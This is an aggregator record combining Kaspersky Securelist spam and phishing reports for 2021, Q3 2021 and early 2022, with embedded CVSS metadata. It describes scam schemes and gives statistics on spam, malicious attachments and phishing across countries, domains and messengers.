We also observed another brief surge in phishing activity in the week from October 31 to November 6, 2021.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08100059/Spam_report_2021_21.png>)\n\n**_Dynamics of phishing activity on WhatsApp in 2021 (weekly number of detected links shown)_**\n\nOn average, the Safe Messaging component detected 45 daily attempts to follow phishing links sent via Telegram. Similar to WhatsApp, phishing activity increased towards the end of the year.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08100143/Spam_report_2021_22.png>)\n\n**_Dynamics of phishing activity on Telegram in 2021 (weekly number of detected links shown)_**\n\nA daily average of 45 links was also detected on Viber, although phishing activity on this messenger dropped off towards the end of the year. However, we observed a peak in August 2021.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08100213/Spam_report_2021_23.png>)\n\n**_Dynamics of phishing activity on Viber in 2021 (weekly number of detected links shown)_**\n\n## Conclusion\n\nAs we had expected, the key trends from 2020 continued into 2021. Attackers actively exploited the subject of COVID-19 in spam e-mails, which remained just as relevant as it was a year earlier. Moreover, baits related to vaccines and QR codes, two of the year's main themes, were added to the bag of pandemic-related tricks. As expected, we continued to observe a variety of schemes devised to hack corporate accounts. In order to achieve their aims, attackers forged e-mails mimicking notifications from various online collaboration tools, sent out notifications about non-existent documents and similar business-related baits. There were also some new trends, such as the investment scam, which is gaining momentum.\n\nThe key trends in phishing attacks and scams are likely to continue into the coming year. 
Fresh "investment projects" will replace their forerunners. "Prize draws" will alternate with holiday giveaways when there's a special occasion to celebrate. Attacks on the corporate sector aren't going anywhere either. Given remote and hybrid working arrangements are here to stay, the demand for corporate accounts on various platforms is unlikely to wane. The topic of COVID-19 vaccination status will also remain relevant. Due to the intensity of the measures being imposed in different countries to stop the spread of the virus, we'll more than likely see a surge in the number of forged documents up for sale on the dark web, offering unrestricted access to public places and allowing holders to enjoy all the freedoms of civilization.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-02-09T10:00:28", "type": "securelist", "title": "Spam and phishing in 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-0802"], "modified": "2022-02-09T10:00:28", "id": "SECURELIST:2625ABE43A309D7E388C4F0EBCA62244", "href": "https://securelist.com/spam-and-phishing-in-2021/105713/", 
"cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-01T16:36:08", "description": "\n\n## Quarterly highlights\n\n### Scamming championship: sports-related fraud\n\nThis summer and early fall saw some major international sporting events. The delayed Euro 2020 soccer tournament was held in June and July, followed by the equally delayed Tokyo Olympics in August. Q3 2021 also featured several F1 Grand Prix races. There was no way that cybercriminals and profiteers could pass up such a golden opportunity. Fans wanting to attend events live encountered fake ticket-selling websites. Some sites made a point of stressing the tickets were "official", despite charging potential victims several times the [real price of a ticket](<https://www.kaspersky.ru/blog/ofitsialnye-bilety-v-teatr/25890/>), and some just took the money and disappeared.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29123731/Spam_report_Q3_2021_01.png>)\n\nScammers also laid traps for those preferring to watch the action online from the comfort of home. Fraudulent websites popped up offering free live broadcasts. On clicking the link, however, the user was asked to pay for a subscription. If that did not deter them, their money and bank card details went straight to the scammers, with no live or any other kind of broadcast in return. This scheme has been used many times before, only instead of sporting events, victims were offered the hottest movie and TV releases.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29123806/Spam_report_Q3_2021_02.png>)\n\nSoccer video games always attract a large following. This success has a downside: gaming platforms get attacked by hackers, especially during major soccer events. Accordingly, the Euro 2020 championship was used by scammers as bait to hijack accounts on the major gaming portal belonging to Japanese gaming giant Konami. 
The cybercriminals offered users big bonuses in connection with the tournament. However, when attempting to claim the bonus, the victim would land on a fake Konami login page. If they entered their credentials, the attackers took over their account and the "bonus" evaporated into thin air.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29123923/Spam_report_Q3_2021_03.png>)\n\n"Nigerian prince" scammers also had a close eye on Q3's sporting fixture. The e-mails that came to our attention talked about multi-million-dollar winnings in Olympics-related giveaways. To receive the prize, victims were asked to fill out a form and e-mail it to the cybercriminals.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124024/Spam_report_Q3_2021_04.png>)\n\nSome messages anticipated upcoming events in the world of sport. The FIFA World Cup is slated for far-off November \u2014 December 2022, yet scammers are already inventing giveaways related to it.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124115/Spam_report_Q3_2021_05.png>)\n\nAmong other things, we found some rather unusual spam e-mails with an invitation to bid for the supply of products to be sold at airports and hotels during the World Cup. Most likely, the recipients would have been asked to pay a small commission to take part in the bidding or giveaway, with no results ever coming forth.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124200/Spam_report_Q3_2021_06.png>)\n\n### Scam: get it yourself, share with friends\n\nIn Q3 2021, our solutions blocked more than 5.6 million redirects to phishing pages. Anniversaries of well-known brands have become a favorite topic for attackers. According to announcements on fake sites, IKEA, Amazon, Tesco and other companies all held prize draws to celebrate a milestone date. 
Wannabe participants had to perform a few simple actions, such as taking a survey or a spot-the-hidden-prize contest, or messaging their social network contacts about the promotion, and then were asked to provide card details, including the CVV code, to receive the promised payout. That done, the attackers not only got access to the card, but also requested payment of a small commission to transfer the (non-existent) winnings. Curiously, the scammers came up with fake round dates, for example, the 80th anniversary of IKEA, which in reality will come two years later. It is always advisable to check promotions on official websites, rather than trusting e-mails, which are easy to spoof.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124249/Spam_report_Q3_2021_07.png>)\n\nThere were also plenty of "holiday deals" supposedly from major Russian brands, with some, it seemed, showing particular generosity in honor of September 1, or Knowledge Day, when all Russian schools and universities go back after the summer break. Those companies allegedly giving away large sums were all related to education in one way or another. At the same time, the fraudulent scheme remained largely the same, with just some minor tinkering round the edges. For example, fake Detsky Mir (Children's World, a major chain of kids' stores) websites promised a fairly large sum of money, but on condition that the applicant sends a message about the "promotion" to 20 contacts or 5 groups. And the payment was then delayed, allegedly due to the need to convert dollars into rubles: for this operation, the "lucky ones" had to pay a small fee.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124402/Spam_report_Q3_2021_08.png>)\n\nOn a fake website holding a giveaway under the Perekrestok brand, after completing the tasks the "winner" was promised as a prize a QR code that could supposedly be used to make purchases in the company's stores. 
Note that Perekrestok does indeed issue coupons with QR codes to customers; that is, the cybercriminals tried to make the e-mail look plausible. When trying to retrieve this code, the potential victim would most likely be asked to pay a "commission" before being able to spend the prize money. Note too that QR codes from questionable sources can carry other threats, for example, spreading malware or debiting money in favor of the scammers.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124531/Spam_report_Q3_2021_09.png>)\n\nIn 2021, there was an increase in the number of fake resources posing as cookie-selling platforms. Users were promised a generous monetary reward (up to $5,000 a day) for selling such data. Those who fell for the tempting offer and followed the link were redirected to a fake page that allegedly "reads cookies from the victim's device to estimate their market value." The "valuation" most often landed in the US$700\u20132,000 range. To receive this money, the user was asked to put the cookies up at a kind of auction, in which different companies were allegedly taking part. The scammers assured that the data would go to the one offering the highest price.\n\nIf the victim agreed, they were asked to link their payment details to the account in the system and to top it up by \u20ac6, which the scammers promised to return, together with the auction earnings, within a few minutes. To top up the balance, the victim was required to enter their bank card details into an online form. 
Naturally, they received no payment, and the \u20ac6 and payment details remained in the attackers' possession.\n\nNote that the very idea of selling cookies from your device is risky: these files can store confidential information about your online activity, in particular session cookies that stand in for your login on frequently used sites, so whoever obtains them can act as you without ever learning your password.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124600/Spam_report_Q3_2021_10-scaled-1.jpeg>)\n\nEven in official mobile app stores, malware can sometimes sneak in. This quarter, for instance, saw a new threat in the shape of fraudulent welfare payment apps that could be downloaded from such platforms. The blurb described them as software that helps find and process payments from the government that the user is entitled to. Due payments (fake, of course) were indeed found, but to receive the money, the user was requested to "pay for legal services relating to form registration". The numerous positive reviews on the app's store page, as well as the design mimicking real government sites, added credibility. We informed the store in question, which removed the fraudulent apps.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124627/Spam_report_Q3_2021_11.png>)\n\n### Spam support: call now, regret later\n\nE-mails inviting the recipient to contact support continue to be spam regulars. If previously they were dominated by IT topics (problems with Windows, suspicious activity on the computer, etc.), recently we have seen a rise in the number of e-mails talking about unexpected purchases, bank card transactions or account deactivation requests. Most likely, the change of subject matter is an attempt to reach a wider audience: messages about unintentional spending and the risk of losing an account can frighten users more than abstract technical problems. 
However, the essence of the scam remained the same: the recipient, puzzled by the e-mail about a purchase or transfer they did not make, tried to call the support service at the number given in the message. To cancel the alleged transaction or purchase, they were asked to give their login credentials for the site from where the e-mail supposedly came. This confidential information fell straight into the hands of the cybercriminals, giving them access to the victim's account.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124650/Spam_report_Q3_2021_12.png>)\n\n### COVID-19\n\nNew life was injected into the COVID-19 topic this quarter. In connection with mass vaccination programs worldwide, and the introduction of QR codes and certificates as evidence of vaccination or antibodies, fraudsters began "selling" their own. We also encountered rogue sites offering negative PCR test certificates. The "customer" was asked first to provide personal information: passport, phone, medical policy, insurance numbers and date of birth, and then to enter their card details to pay for the purchase. As a result, all this information went straight to the malefactors.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124714/Spam_report_Q3_2021_13.png>)\n\nSpam in the name of generous philanthropists and large organizations offering lockdown compensation is already a standard variant of the "Nigerian prince" scam.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124741/Spam_report_Q3_2021_14.png>)\n\nHowever, "Nigerian prince" scams are not all that might await recipients of such messages. For example, the authors of spam exploiting Argentina's BBVA name had a different objective. Users were invited to apply for government subsidy through this bank. To do so, they had to unpack a RAR archive that allegedly contained a certificate confirming the compensation. 
In reality, the archive harbored malware detected by our solutions as Trojan.Win32.Mucc.pqp.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124803/Spam_report_Q3_2021_15.png>)\n\nCybercriminals also used other common COVID-19 topics to trick recipients into opening malicious attachments. In particular, we came across messages about the spread of the delta variant and about vaccination. The e-mail headers were picked from various information sources, chosen, most likely, for their intriguing nature. The attached document, detected as [Trojan.MSOffice.SAgent.gen](<https://threats.kaspersky.com/en/threat/Trojan.MSOffice.SAgent/>), contained a macro for running a PowerShell script. SAgent malware is used at the initial stage of the attack to deliver other malware to the victim's system.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124828/Spam_report_Q3_2021_16.png>)\n\n### Corporate privacy\n\nA new trend emerged this quarter in spam e-mails aimed at stealing credentials for corporate accounts, whereby cybercriminals asked recipients to make a payment. But upon going to the website to view the payment request, the potential victims were requested to enter work account login details. If they complied, the attackers got hold of the account.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124852/Spam_report_Q3_2021_17.png>)\n\n## Statistics: spam\n\n### Share of spam in mail traffic\n\nIn Q3 2021, the share of spam in global mail traffic fell once again, averaging 45.47% \u2014 down 1.09 p.p. against Q2 and 0.2 p.p. against Q1.\n\n_Share of spam in global mail traffic, April \u2013 September 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131406/01-en-spam-report-q3.png>))_\n\nIn July, this indicator fell to its lowest value since the beginning of 2021 (44.95%) \u2014 0.15 p.p. 
less than in March, the quietest month of H1. The highest share of spam in Q3 was seen in August (45.84%).\n\n### Source of spam by country\n\nThe top spam-source country is still Russia (24.90%), despite its share dropping slightly in Q3. Germany (14.19%) remains in second place, while China (10.31%) moved into third this quarter, adding 2.53 p.p. Meanwhile, the US (9.15%) shed 2.09 p.p. and fell to fourth place, while the Netherlands held on to fifth (4.96%).\n\n_Source of spam by country, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131453/03-en-spam-report-q3.png>))_\n\nOn the whole, the TOP 10 countries supplying the bulk of spam e-mails remained virtually unchanged from Q2. Sixth position still belongs to France (3.49%). Brazil (2.76%) added 0.49 p.p., overtaking Spain (2.70%) and Japan (2.24%), but the TOP 10 members remained the same. At the foot of the ranking, as in the previous reporting period, is India (1.83%).\n\n### Malicious mail attachments\n\nMail Anti-Virus this quarter blocked more malicious attachments than in Q2. Our solutions detected 35,958,888 pieces of malware, over 1.7 million more than in the previous reporting period.\n\n_Dynamics of Mail Anti-Virus triggerings, April \u2013 September 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131519/04-en-spam-report-q3.png>))_\n\nDuring the quarter, the number of Mail Anti-Virus triggerings grew: the quietest month was July, when our solutions intercepted just over 11 million attempts to open an infected file, while the busiest was September, with 12,680,778 malicious attachments blocked.\n\n#### Malware families\n\nIn Q3 2021, Trojans from the [Agensla](<https://threats.kaspersky.com/en/threat/Trojan-PSW.MSIL.Agensla/>) family (9.74%) were again the most widespread malware in spam. Their share increased by 3.09 p.p. against the last quarter. 
These Trojans are designed to steal login credentials from the victim's device. The share of the [Badun](<https://threats.kaspersky.com/en/threat/Trojan.Win32.Badun/>) family, which consists of various malware disguised as electronic documents, decreased slightly, pushing it into second place. Third place was taken by the [Noon](<https://threats.kaspersky.com/en/threat/Trojan-Spy.MSIL.Noon/>) spyware (5.19%), whose 32-bit [relatives](<https://threats.kaspersky.com/en/threat/Trojan-Spy.Win32.Noon/>) (1.71%) moved down to ninth. Meanwhile, the [Taskun](<https://threats.kaspersky.com/en/threat/Trojan.MSIL.Taskun/>) family, which creates malicious tasks in Task Scheduler, finished fourth this time around, despite its share rising slightly.\n\n_TOP 10 malware families in mail traffic, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131546/05-en-spam-report-q3.png>))_\n\nThe sixth place in TOP 10 common malware families in spam in Q3 was occupied by [exploits for the CVE-2018-0802 vulnerability](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2018-0802/>) (3.28%), a new addition to the list. This vulnerability affects the Equation Editor component, just like the older but still popular (among cybercriminals) CVE-2017-11882, [exploits for which](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2017-11882/>) (3.29%) were the fifth most prevalent in Q3. Seventh position went to malicious [ISO](<https://threats.kaspersky.com/en/threat/Trojan.Win32.ISO/>) disk images (2.97%), and eighth to [Androm](<https://threats.kaspersky.com/en/threat/Backdoor.MSIL.Androm/>) backdoors (1.95%). Loaders from the [Agent](<https://threats.kaspersky.com/en/threat/Trojan-Downloader.MSOffice.Agent/>) family again propped up the ranking (1.69%).\n\nThe TOP 10 most widespread e-mail malware in Q3 was similar to the families ranking. 
The only difference is that ninth place among individual samples is occupied by Trojan-PSW.MSIL.Stealer.gen stealers.\n\n_TOP 10 malicious attachments in spam, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131613/06-en-spam-report-q3.png>))_\n\n#### Countries targeted by malicious mailings\n\nIn Q3, Mail Anti-Virus was most frequently triggered on the computers of users in Spain. This country's share again grew slightly relative to the previous reporting period, amounting to 9.55%. Russia climbed to second place, accounting for 6.52% of all mail attachments blocked from July to September. Italy (5.47%) rounds out the TOP 3, its share continuing to decline in Q3.\n\n_Countries targeted by malicious mailings, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131639/07-en-spam-report-q3.png>))_\n\nBrazil (5.37%) gained 2.46 p.p. and moved up to fourth position by number of Mail Anti-Virus triggerings. It is followed by Mexico (4.69%), Vietnam (4.25%) and Germany (3.68%). The UAE (3.65%) dropped to eighth place. Also among the TOP 10 targets are Turkey (3.27%) and Malaysia (2.78%).\n\n## Statistics: phishing\n\nIn Q3, the Anti-Phishing system blocked 46,340,156 attempts to open phishing links. A total of 3.56% of Kaspersky users encountered this threat.\n\n### Geography of phishing attacks\n\nBrazil had the largest share of affected users (6.63%). The TOP 3 also included Australia (6.41%) and Bangladesh (5.42%), while Israel (5.33%) dropped from second to fifth, making way for Qatar (5.36%).\n\n_Geography of phishing attacks, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131707/08-en-spam-report-q3.png>))_\n\n### Top-level domains\n\nThe top-level domain most commonly used for hosting phishing pages in Q3, as before, was COM (29.17%). Reclaiming second place was XYZ (14.17%), whose share increased by 5.66 p.p. 
compared to the previous quarter. ORG (3.65%) lost 5.14 p.p. and moved down to fifth place, letting both the Chinese domain CN (9.01%) and TOP (3.93%) overtake it.

_Top-level domain zones most commonly used for phishing, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131734/09-en-spam-report-q3.png>))_

The Russian domain RU (2.60%) remained the sixth most popular among cybercriminals in Q3, while the last four lines of the TOP 10 are occupied by the international domains NET (2.42%), SITE (1.84%), ONLINE (1.40%) and INFO (1.11%).

### Organizations under phishing attack

_The rating of organizations targeted by phishers is based on the triggering of the deterministic component in the Anti-Phishing system on user computers. The component detects all pages with phishing content that the user has tried to open by following a link in an email message or on the web, as long as links to these pages are present in the Kaspersky database._

Global internet portals (20.68%) lead the list of organizations whose brands were most often used by cybercriminals as bait. Online stores (20.63%) are in second place by a whisker. Third place, as in the last quarter, is taken by banks (11.94%), and fourth by payment systems (7.78%). Fifth and sixth positions go to the categories "Social networks and blogs" (6.24%) and "IMs" (5.06%), respectively.

_Distribution of organizations whose users were targeted by phishers, by category, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131759/10-en-spam-report-q3.png>))_

The seventh line is occupied by online games (2.42%). Note that for the past two years websites in this category have featured in the TOP 10 baits specifically in the third quarter.
Financial services (1.81%), IT companies (1.72%) and telecommunication companies (1.45%) round out the ranking.

### Phishing in messengers

_Statistics on messenger-based phishing are based on anonymized data from the Safe Messaging component of Kaspersky Internet Security for Android, voluntarily provided by users of this solution. Safe Messaging scans incoming messages and blocks attempts to follow any phishing or otherwise malicious links in them._

In Q3 2021, Safe Messaging blocked 117,854 attempted redirects via phishing links in various messengers. Of these, 106,359 links (90.25%) were detected and blocked in WhatsApp messages. Viber accounted for 5.68%, Telegram for 3.74% and Google Hangouts for 0.02% of all detected links.

_Distribution of links blocked by the Safe Messaging component, by messenger, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131830/11-en-spam-report-q3.png>))_

On WhatsApp, Safe Messaging detected an average of 900 phishing links per day during the quarter. There was a surge in scamming activity in this period, though — on July 12–16 the system blocked more than 4,000 links a day. This spike coincided with an increase in detections of the Trojan.AndroidOS.Whatreg.b Trojan, which registers new WhatsApp accounts from infected devices.
We cannot say for sure what exactly these accounts get up to and whether they have anything to do with the rise in phishing on WhatsApp, but it is possible that cybercriminals use them for spamming.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29132007/Spam_report_Q3_2021_18.png>)

**_Dynamics of phishing activity on WhatsApp, Q3 2021_**

As for Telegram, phishing activity there increased slightly towards the end of the quarter.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29132044/Spam_report_Q3_2021_19.png>)

**_Dynamics of phishing activity on Telegram, Q3 2021_**

## Takeaways

Next quarter, we can expect Christmas- and New Year-themed mailings. Ahead of the festive season, many people make purchases from online stores, a fact exploited by cybercriminals. Anonymous fake stores taking money for non-existent or substandard goods are likely to be a popular scamming method during this period. Also beware of fraudulent copies of big-name trading platforms — such sites traditionally mushroom ahead of the festive frenzy. Corporate users too should remain sharp-eyed — even a congratulatory e-mail seemingly from a partner may be phishing for confidential information.

The COVID-19 topic will still be hot in the next quarter. The fourth wave of the pandemic, vaccinations and the introduction of COVID passports in many countries will surely give rise to new malicious mailings.
Also be on the lookout for websites offering compensation payments: if previous quarters are anything to go by, cybercriminals will continue to find new and enticing ways to lure their victims.

_Source: "Spam and phishing in Q3 2021", Securelist, published 2021-11-01, https://securelist.com/spam-and-phishing-in-q3-2021/104741/_

## Figures of the year

In 2022:

 * 48.63% of all emails around the world and 52.78% of all emails in the Russian segment of the internet were spam
 * As much as 29.82% of all spam emails originated in Russia
 * Kaspersky Mail Anti-Virus blocked 166,187,118 malicious email attachments
 * Our Anti-Phishing system thwarted 507,851,735 attempts to follow phishing links
 * 378,496 attempts to follow phishing links
were associated with Telegram account hijacking

## Phishing in 2022

### Last year's resonant global events

The year 2022 saw cybercrooks try to profit from new film releases and premieres just as they always have. The bait included the most awaited and talked-about releases: the new season of Stranger Things, the new Batman movie, and the Oscar nominees. Short-lived phishing sites often offered a chance to see the premieres before the eagerly awaited movie or television show was scheduled to hit the screen. Those who just could not wait were in for a disappointment and a waste of cash. The promises of completely free access to the new content were never true. By clicking what appeared to be a link to the movie, the visitor got to view the official trailer or a film studio logo. Several seconds into the "preview", the stream was interrupted by an offer to buy an inexpensive subscription right there on the website to continue watching. If the movie lover entered their bank card details on the fake site, they risked paying more than the displayed amount for content that did not exist and sharing their card details with the scammers.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13132238/spam-phishing-report-2022-01.png>)

Some websites that offered soccer fans free broadcasts of the FIFA World Cup in Qatar employed a similar scheme, but the variety of hoaxes aimed at soccer fans proved to be wider than that used by scammers who attacked film lovers. Thus, during the World Cup a brand-new scam appeared: it invited users to win a newly released iPhone 14 by predicting match outcomes. After answering every question, the victim was told that they were almost there, but there was a small commission to be paid before they could get their gadget.
Of course, no prize ensued after the fee was paid.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13132326/spam-phishing-report-2022-02.jpg>)

Soccer fans chasing merchandise risked compromising their bank cards or just losing some money. Scammers created websites that offered souvenirs at low prices, including rare items that were out of stock in legitimate online stores. Those who chose to spend their money on a shady website risked never getting what they ordered.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13132414/spam-phishing-report-2022-03.jpg>)

Websites that offered tickets to the finals were another type of soccer-flavored bait. Scammers were betting on the finals typically being the most popular stage of the competition, tickets to which are often hard to get. Unlike legitimate ticket stores, the fake resellers were showing available seats in every sector even when the World Cup was almost over. A vast selection of available seats should have alarmed visitors: real tickets would have been largely gone.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13132716/spam-phishing-report-2022-04.png>)

Fake donation sites started popping up after the Ukraine crisis broke out in 2022, pretending to accept money as aid to Ukraine. These sites referenced public figures and humanitarian groups, offering to accept cash in cryptocurrency, something that should have raised a red flag in itself.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13132903/spam-phishing-report-2022-05.png>)

### The pandemic

The COVID-19 theme had lost relevance by late 2022 as the pandemic restrictions had been lifted in most countries. At the beginning of that year, we still observed phishing attacks that used the themes of infection and prevention as the bait.
For example, one website invited users to obtain a COVID vaccination certificate by entering their British National Health Service (NHS) account credentials. Others offered the coveted Green Pass without vaccination.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13141812/spam-phishing-report-2022-06.png>)

Scammers abused legitimate survey services by creating polls in the name of various organizations to profit from victims' personal, including sensitive, data. In another COVID-themed scheme, the con artists introduced themselves as the Direct Relief charity, which helps to improve the quality of life and healthcare in poorer regions. Visitors were invited to fill out a form to be eligible for $750 per week in aid for twenty-six weeks. The survey page said the "charity" found the victim's telephone number in a database of individuals affected by COVID-19. Those who wished to receive the "aid" were asked to state their full name, contact details, date of birth, social security and driver's license numbers, gender, and current employer, attaching a scanned copy of their driver's license. To lend an air of authenticity and to motivate the victim to enter valid information, the swindlers warned that the victim could be prosecuted for providing false information. The scheme likely aimed at identity theft: the illegal use of others' personal details for deriving profit. The cybercrooks might also use the data to contact their victims later, staging a more convincing swindle.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13141841/spam-phishing-report-2022-07.png>)

### Crypto phishing and crypto scams

The unabated popularity of cryptocurrency saw crypto scammers' interest in wallet owners' accounts growing, despite the fact that rates continued to drop throughout the year. Cybercriminals chased seed phrases, used for recovering access to virtual funds.
By getting the user's secret phrase, cybercriminals could get access to their cryptocurrency balance.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13141926/spam-phishing-report-2022-08.png>)

In a typical internet hoax manner, crypto scam sites invited visitors to get rich quick by paying a small fee. Unlike common easy-money scams, these websites asked for payments in cryptocurrency — which they promised to give away and which they were trying to steal. The "giveaways" were timed to coincide with events that were directly or indirectly associated with cryptocurrency. Thus, one of the fake sites promised prizes on the occasion of Nvidia's thirtieth anniversary (the company is a major vendor of graphics processing units, which are sometimes used for crypto mining). Promotion of cryptocurrency use was another pretext for the "giveaways". Users were invited to deposit up to 100 cryptocurrency units for a promise to refund two times that amount, purportedly to speed up digital currency adoption. In reality, the scheme worked the way any other internet hoax would: the self-professed altruists went off the radar once they received the deposit.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142443/spam-phishing-report-2022-09.png>)

### Compensation, bonus, and paid survey scams

Bonuses and compensations are hard to deny in times of crisis and instability, but it is worth keeping in mind that "financial assistance" is frequently promised by con artists to swindle you out of your money.

"Promotional campaigns by major banks" were a popular bait in 2022. Visitors to a fraudulent web page were offered to receive a one-time payment or to take a service quality survey for a fee. Unlike the prizes offered in the aforementioned crypto schemes, these fees were smaller: an equivalent of $30–40.
The cybercriminals used an array of techniques to lull victims into a false sense of security: company logos, assurances that the campaigns were legit, as well as detailed, lifelike descriptions of the offer. Similar "campaigns" were staged in the name of other types of organizations, for example, the Polish finance ministry.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142523/spam-phishing-report-2022-10.png>)

Aid as distributed by various governmental and nongovernmental organizations remained a popular fraud theme in 2022. For example, in Muslim countries, scammers promised to send charity packages, purportedly under a "Ramadan Relief" program that aimed at helping low-income families during the Ramadan fast. The fasting period typically sees higher prices for food and household products, while observers buy more than they normally do and may be faced with a shortage of money. Legitimate charities, such as [WF-AID](<https://wfaid.org/rrf/>), do operate Ramadan relief programs, and judging by the screenshot below, the fraudsters were pretending to represent that organization. An eye-catching picture of the organization's logo and huge boxes was accompanied by a list of foodstuffs included in the aid package, with positive "recipient feedback" posted below the message. The victim was asked to make sure that their name was on the list of recipients, so they could get a package. This required providing personal data on the website and sending a link to the scam site to instant messaging contacts — nothing extraordinary for hoaxes like this. This way, the scammers both populate their databases and have victims spread links to their malicious resources for them.
In addition to that, they might ask the victim to cover the "shipping costs".

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142600/spam-phishing-report-2022-11.png>)

Growing utility rates and an increase in the price of natural resources have prompted several governments to start discussing compensations for the population. Payout notices could arrive by mail, email, or as a text message. Cybercriminals attempted to take advantage of the situation by creating web pages that mimicked government websites, promising cash for covering utility payments or compensation of utility expenses. Visitors were occasionally asked to provide personal details under the pretext of checking that they were eligible, or simply to fill out a questionnaire. In Britain, con artists posing as a government authority promised to compensate electricity costs. The description of the one-time payout was copied from the official website of the authority, which did in fact offer that type of compensation. After completing the questionnaire, the victim was asked to specify the electric utility whose services they were using and enter the details of the bank card linked to their account with the utility. The promise of £400 was supposed to make the victim drop their guard and share their personal information.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142636/spam-phishing-report-2022-12.png>)

In Singapore, scammers offered a refund of water supply costs, purportedly because of double billing.
An energy or resource crisis was not used as a pretext in this particular case, but refunds were still offered in the name of the water supply authority.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142706/spam-phishing-report-2022-13.png>)

### Fake online stores and large vendor phishing

We see fake websites that imitate large online stores and marketplaces year after year, and 2022 was no exception. Phishing attacks targeted both the customers of globally known retailers and regional players. An attack often started with the victim receiving a link to a certain product supposedly offered at an attractive price, by email, in an instant messaging app, or on a social network. Those who fell for the trick could lose access to their accounts, have their bank card details stolen, or waste the money they wanted to spend on the dirt-cheap item.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142737/spam-phishing-report-2022-14.png>)

"Insider" tips about "private sales" were also used as a lure. For example, a web page that copied the appearance of a Russian marketplace promised discounts of up to 90% on all items listed on it. The page design did look credible, with the only potential red flags being the very low prices and the URL in the address bar not matching the official one.

